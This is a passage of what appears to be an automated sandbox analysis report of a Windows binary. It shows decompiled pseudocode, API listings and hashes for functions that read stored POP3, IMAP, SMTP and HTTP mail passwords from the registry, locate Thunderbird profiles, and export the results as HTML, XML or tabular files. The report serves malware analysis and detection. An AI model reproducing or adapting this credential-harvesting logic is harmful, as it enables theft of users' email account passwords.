                                                                                					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
                                                                                					if(_t66 != 0) {
                                                                                						E004021D8(_t111 - 0x404);
                                                                                						strcpy(_t111 - 0x1f0, _t111 - 0x60);
                                                                                						_pop(_t95);
                                                                                						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
                                                                                						_t37 = _t92 + 1; // 0x1
                                                                                						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
                                                                                						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
                                                                                						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
                                                                                						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
                                                                                						if(_t92 != 3) {
                                                                                							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
                                                                                							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
                                                                                							_t114 = _t114 + 0xc;
                                                                                						}
                                                                                						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
                                                                                						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
                                                                                						_t109 =  *((intOrPtr*)(_t111 + 0x78));
                                                                                						_t114 = _t114 + 0x18;
                                                                                						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
                                                                                						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
                                                                                						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
                                                                                					}
                                                                                					_t92 = _t92 + 1;
                                                                                				} while (_t92 < 4);
                                                                                				return _t66;
                                                                                			}













                                                                                APIs
                                                                                • memset.MSVCRT ref: 00402878
                                                                                  • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                                                • strcpy.MSVCRT(?,?,73AFED80,?,00000000), ref: 004028B2
                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,73AFED80,?,00000000), ref: 00402980
                                                                                  • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                                                • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                • API String ID: 2416467034-4086712241
                                                                                • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                                                • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E0040F435(CHAR* __eax) {
                                                                                				void* _v8;
                                                                                				int _v12;
                                                                                				void _v267;
                                                                                				char _v268;
                                                                                				void _v531;
                                                                                				char _v532;
                                                                                				void _v787;
                                                                                				char _v788;
                                                                                				void _v1051;
                                                                                				char _v1052;
                                                                                				void _v2075;
                                                                                				char _v2076;
                                                                                				void* __esi;
                                                                                				void* _t45;
                                                                                				void* _t59;
                                                                                				char* _t60;
                                                                                				char* _t71;
                                                                                				char* _t75;
                                                                                				void* _t84;
                                                                                				CHAR* _t89;
                                                                                				void* _t90;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                
                                                                                				_t89 = __eax;
                                                                                				_v1052 = 0;
                                                                                				memset( &_v1051, 0, 0x104);
                                                                                				_v788 = 0;
                                                                                				memset( &_v787, 0, 0xff);
                                                                                				 *_t89 = 0;
                                                                                				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
                                                                                				_t91 = _t90 + 0x24;
                                                                                				if(_t45 != 0) {
                                                                                					L12:
                                                                                					strcpy(_t89,  &_v1052);
                                                                                					if( *_t89 == 0) {
                                                                                						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
                                                                                						if(E0040F3BA(_t89) == 0) {
                                                                                							 *_t89 = 0;
                                                                                						}
                                                                                						if( *_t89 == 0) {
                                                                                							E00406172(_t89);
                                                                                							if(E0040F3BA(_t89) == 0) {
                                                                                								 *_t89 = 0;
                                                                                							}
                                                                                							if( *_t89 == 0) {
                                                                                								GetCurrentDirectoryA(0x104, _t89);
                                                                                								if(E0040F3BA(_t89) == 0) {
                                                                                									 *_t89 = 0;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return 0 |  *_t89 != 0x00000000;
                                                                                				} else {
                                                                                					_v268 = 0;
                                                                                					memset( &_v267, 0, 0xff);
                                                                                					_v12 = 0;
                                                                                					_t59 = E0040EC05(_v8, 0,  &_v268);
                                                                                					_t92 = _t91 + 0x18;
                                                                                					while(_t59 == 0) {
                                                                                						_push(7);
                                                                                						_t60 =  &_v268;
                                                                                						_push("mozilla");
                                                                                						_push(_t60);
                                                                                						L00411642();
                                                                                						_t93 = _t92 + 0xc;
                                                                                						if(_t60 == 0) {
                                                                                							_v532 = 0;
                                                                                							memset( &_v531, 0, 0x104);
                                                                                							_v2076 = 0;
                                                                                							memset( &_v2075, 0, 0x3ff);
                                                                                							_push( &_v268);
                                                                                							_push("%s\\bin");
                                                                                							_push(0x3ff);
                                                                                							_push( &_v2076);
                                                                                							L00411648();
                                                                                							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
                                                                                							_t71 =  &_v532;
                                                                                							_push(0x5c);
                                                                                							_push(_t71);
                                                                                							L0041164E();
                                                                                							_t93 = _t93 + 0x44;
                                                                                							if(_t71 != 0) {
                                                                                								 *_t71 = 0;
                                                                                							}
                                                                                							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
                                                                                								_push( &_v788);
                                                                                								_t75 =  &_v268;
                                                                                								L004115C4();
                                                                                								_t84 = _t75;
                                                                                								if(_t75 > 0) {
                                                                                									strcpy( &_v1052,  &_v532);
                                                                                									strcpy( &_v788,  &_v268);
                                                                                									_t93 = _t93 + 0x10;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_v12 = _v12 + 1;
                                                                                						_t59 = E0040EC05(_v8, _v12,  &_v268);
                                                                                						_t92 = _t93 + 0xc;
                                                                                					}
                                                                                					RegCloseKey(_v8);
                                                                                					goto L12;
                                                                                				}
                                                                                			}




























                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F459
                                                                                • memset.MSVCRT ref: 0040F471
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 0040F4A9
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                                • memset.MSVCRT ref: 0040F4F6
                                                                                • memset.MSVCRT ref: 0040F50E
                                                                                • _snprintf.MSVCRT ref: 0040F52B
                                                                                • _mbsrchr.MSVCRT ref: 0040F555
                                                                                • _mbsicmp.MSVCRT ref: 0040F589
                                                                                • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                                • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                                • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                                • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                • API String ID: 3269028891-3267283505
                                                                                • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                                                • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                                • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E0040F126(void* __edi, char* _a4, char* _a8) {
                                                                                				int _v8;
                                                                                				void _v263;
                                                                                				char _v264;
                                                                                				void _v519;
                                                                                				char _v520;
                                                                                				intOrPtr _t32;
                                                                                				void* _t58;
                                                                                				char* _t60;
                                                                                				void* _t61;
                                                                                				void* _t62;
                                                                                
                                                                                				_t58 = __edi;
                                                                                				_v264 = 0;
                                                                                				memset( &_v263, 0, 0xfe);
                                                                                				_v520 = 0;
                                                                                				memset( &_v519, 0, 0xfe);
                                                                                				_t62 = _t61 + 0x18;
                                                                                				_v8 = 1;
                                                                                				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
                                                                                					_v8 = 0;
                                                                                				}
                                                                                				_t60 = _a4;
                                                                                				 *_t60 = 0;
                                                                                				if(_v8 != 0) {
                                                                                					strcpy(_t60, "<font");
                                                                                					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                					if(_t32 > 0) {
                                                                                						sprintf( &_v264, " size=\"%d\"", _t32);
                                                                                						strcat(_t60,  &_v264);
                                                                                						_t62 = _t62 + 0x14;
                                                                                					}
                                                                                					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
                                                                                						strcat(_t60,  &_v264);
                                                                                					}
                                                                                					strcat(_t60, ">");
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                					strcat(_t60, "<b>");
                                                                                				}
                                                                                				strcat(_t60, _a8);
                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                					strcat(_t60, "</b>");
                                                                                				}
                                                                                				if(_v8 != 0) {
                                                                                					strcat(_t60, "</font>");
                                                                                				}
                                                                                				return _t60;
                                                                                			}


                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F147
                                                                                • memset.MSVCRT ref: 0040F15B
                                                                                • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                                • sprintf.MSVCRT ref: 0040F1A3
                                                                                • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                                • sprintf.MSVCRT ref: 0040F1DA
                                                                                • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                                • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                                • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                                • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                                • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                                • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcat$memsetsprintf$strcpy
                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                • API String ID: 1662040868-1996832678
                                                                                • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                                • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040AF17(void* __eax, intOrPtr _a4) {
                                                                                				char _v271;
                                                                                				char _v532;
                                                                                				intOrPtr _v536;
                                                                                				char _v540;
                                                                                				void _v803;
                                                                                				char _v804;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				char* _t47;
                                                                                				intOrPtr _t67;
                                                                                				WINDOWPLACEMENT* _t73;
                                                                                				void* _t75;
                                                                                				char* _t83;
                                                                                				struct HWND__* _t84;
                                                                                				intOrPtr _t88;
                                                                                				int _t90;
                                                                                
                                                                                				_t75 = __eax;
                                                                                				_v804 = 0;
                                                                                				memset( &_v803, 0, 0x104);
                                                                                				GetModuleFileNameA(0,  &_v804, 0x104);
                                                                                				_t47 = strrchr( &_v804, 0x2e);
                                                                                				if(_t47 != 0) {
                                                                                					 *_t47 = 0;
                                                                                				}
                                                                                				strcat( &_v804, ".cfg");
                                                                                				_v536 = _a4;
                                                                                				_v540 = 0x413bdc;
                                                                                				_v532 = 0;
                                                                                				_v271 = 0;
                                                                                				strcpy( &_v532,  &_v804);
                                                                                				strcpy( &_v271, "General");
                                                                                				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
                                                                                				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
                                                                                				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
                                                                                				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
                                                                                				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
                                                                                				_t67 = _v536;
                                                                                				_a4 = _t67;
                                                                                				_t90 = 0x2c;
                                                                                				if(_t67 != 0) {
                                                                                					_t84 =  *(_t75 + 0x108);
                                                                                					if(_t84 != 0) {
                                                                                						_t73 = _t75 + 0x128;
                                                                                						_t73->length = _t90;
                                                                                						GetWindowPlacement(_t84, _t73);
                                                                                					}
                                                                                				}
                                                                                				_t83 =  &_v540;
                                                                                				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
                                                                                				if(_a4 == 0) {
                                                                                					E00401896(_t75);
                                                                                				}
                                                                                				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
                                                                                			}


                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040AF3C
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                                                • strrchr.MSVCRT ref: 0040AF5C
                                                                                • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                                                • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                                                • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                • API String ID: 1301239246-2014360536
                                                                                • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                                                • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                                                • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				signed int _v20;
                                                                                				signed int _v24;
                                                                                				signed int _v28;
                                                                                				void _v79;
                                                                                				char _v80;
                                                                                				void _v131;
                                                                                				char _v132;
                                                                                				void _v183;
                                                                                				char _v184;
                                                                                				char _v236;
                                                                                				void _v491;
                                                                                				char _v492;
                                                                                				void* __edi;
                                                                                				void* _t83;
                                                                                				void* _t100;
                                                                                				char* _t103;
                                                                                				intOrPtr* _t120;
                                                                                				signed int _t121;
                                                                                				char _t139;
                                                                                				signed int _t152;
                                                                                				signed int _t153;
                                                                                				signed int _t156;
                                                                                				intOrPtr* _t157;
                                                                                				void* _t158;
                                                                                				void* _t160;
                                                                                
                                                                                				_t120 = __ebx;
                                                                                				_v492 = 0;
                                                                                				memset( &_v491, 0, 0xfe);
                                                                                				_t121 = 0xc;
                                                                                				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
                                                                                				asm("movsb");
                                                                                				_t156 = 0;
                                                                                				_v132 = 0;
                                                                                				memset( &_v131, 0, 0x31);
                                                                                				_v184 = 0;
                                                                                				memset( &_v183, 0, 0x31);
                                                                                				_v80 = 0;
                                                                                				memset( &_v79, 0, 0x31);
                                                                                				_t160 = _t158 + 0x3c;
                                                                                				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
                                                                                				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
                                                                                				if(_t83 != 0xffffffff) {
                                                                                					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
                                                                                					_t160 = _t160 + 0x14;
                                                                                				}
                                                                                				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                				_v8 = _t156;
                                                                                				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
                                                                                					while(1) {
                                                                                						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
                                                                                						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
                                                                                							strcpy( &_v80, " nowrap");
                                                                                						}
                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                						_v20 = _v20 | 0xffffffff;
                                                                                						_v16 = _t156;
                                                                                						_t157 = _a8;
                                                                                						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
                                                                                						E0040F071(_v28,  &_v184);
                                                                                						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
                                                                                						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
                                                                                						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
                                                                                						_t153 = _t152 * 0x14;
                                                                                						if(_t100 == 0xffffffff) {
                                                                                							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
                                                                                						} else {
                                                                                							_push( *(_t153 + _v12 + 0x10));
                                                                                							_push(E0040F071(_t100,  &_v492));
                                                                                							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
                                                                                							_t160 = _t160 + 0x10;
                                                                                						}
                                                                                						_t103 =  *(_t120 + 0x50);
                                                                                						_t139 =  *_t103;
                                                                                						if(_t139 == 0 || _t139 == 0x20) {
                                                                                							strcat(_t103, "&nbsp;");
                                                                                						}
                                                                                						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
                                                                                						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
                                                                                						E00405EFD(_a4,  *(_t120 + 0x4c));
                                                                                						_t160 = _t160 + 0x2c;
                                                                                						_v8 = _v8 + 1;
                                                                                						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
                                                                                							goto L14;
                                                                                						}
                                                                                						_t156 = 0;
                                                                                					}
                                                                                				}
                                                                                				L14:
                                                                                				E00405EFD(_a4, "</table><p>");
                                                                                				return E00405EFD(_a4, 0x412b1c);
                                                                                			}
































                                                                                APIs
                                                                                • memset.MSVCRT ref: 004094A2
                                                                                • memset.MSVCRT ref: 004094C5
                                                                                • memset.MSVCRT ref: 004094DB
                                                                                • memset.MSVCRT ref: 004094EB
                                                                                • sprintf.MSVCRT ref: 0040951F
                                                                                • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                                • sprintf.MSVCRT ref: 004095ED
                                                                                • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                                  • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                                • strcpy.MSVCRT(?,?), ref: 00409601
                                                                                • sprintf.MSVCRT ref: 00409650
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                • API String ID: 2822972341-601624466
                                                                                • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                                                • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                                • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00409EC4(void* __eax) {
                                                                                				void* _v36;
                                                                                				long _v40;
                                                                                				void* _v44;
                                                                                				void* _v56;
                                                                                				long _t21;
                                                                                				void* _t24;
                                                                                				long _t26;
                                                                                				long _t34;
                                                                                				long _t37;
                                                                                				intOrPtr* _t40;
                                                                                				void* _t42;
                                                                                				intOrPtr* _t44;
                                                                                				void* _t47;
                                                                                
                                                                                				_t40 = ImageList_Create;
                                                                                				_t47 = __eax;
                                                                                				_t44 = __imp__ImageList_SetImageCount;
                                                                                				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
                                                                                					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                					 *(_t47 + 0x18c) = _t37;
                                                                                					 *_t44(_t37, 1);
                                                                                					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                                                					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                                                					 *(_t47 + 0x190) = _t34;
                                                                                					 *_t44(_t34, 1);
                                                                                					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                                                				}
                                                                                				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                                                				 *(_t47 + 0x188) = _t21;
                                                                                				 *_t44(_t21, 2);
                                                                                				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                				_t42 = _t24;
                                                                                				 *_t44( *(_t47 + 0x188), 0);
                                                                                				_t26 = GetSysColor(0xf);
                                                                                				_v40 = _t26;
                                                                                				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                                                				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                                                				DeleteObject(_v56);
                                                                                				DeleteObject(_t42);
                                                                                				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                                                			}

















                                                                                APIs
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                                • SendMessageA.USER32 ref: 00409F11
                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                                • SendMessageA.USER32 ref: 00409F46
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                                • LoadImageA.USER32 ref: 00409F7B
                                                                                • LoadImageA.USER32 ref: 00409F97
                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                                • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                                • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                                • DeleteObject.GDI32(?), ref: 00409FDB
                                                                                • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                                • SendMessageA.USER32 ref: 00409FFC
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                                • String ID:
                                                                                • API String ID: 3411798969-0
                                                                                • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                                • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                                • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 70%
                                                                                			E0040B841(signed int __eax, void* __esi) {
                                                                                				void* _t5;
                                                                                				void* _t6;
                                                                                				void* _t7;
                                                                                				void* _t8;
                                                                                				void* _t9;
                                                                                				void* _t10;
                                                                                
                                                                                				_push("/shtml");
                                                                                				L004115B2();
                                                                                				if(__eax != 0) {
                                                                                					_push("/sverhtml");
                                                                                					L004115B2();
                                                                                					if(__eax != 0) {
                                                                                						_push("/sxml");
                                                                                						L004115B2();
                                                                                						if(__eax != 0) {
                                                                                							_push("/stab");
                                                                                							L004115B2();
                                                                                							if(__eax != 0) {
                                                                                								_push("/scomma");
                                                                                								L004115B2();
                                                                                								if(__eax != 0) {
                                                                                									_push("/stabular");
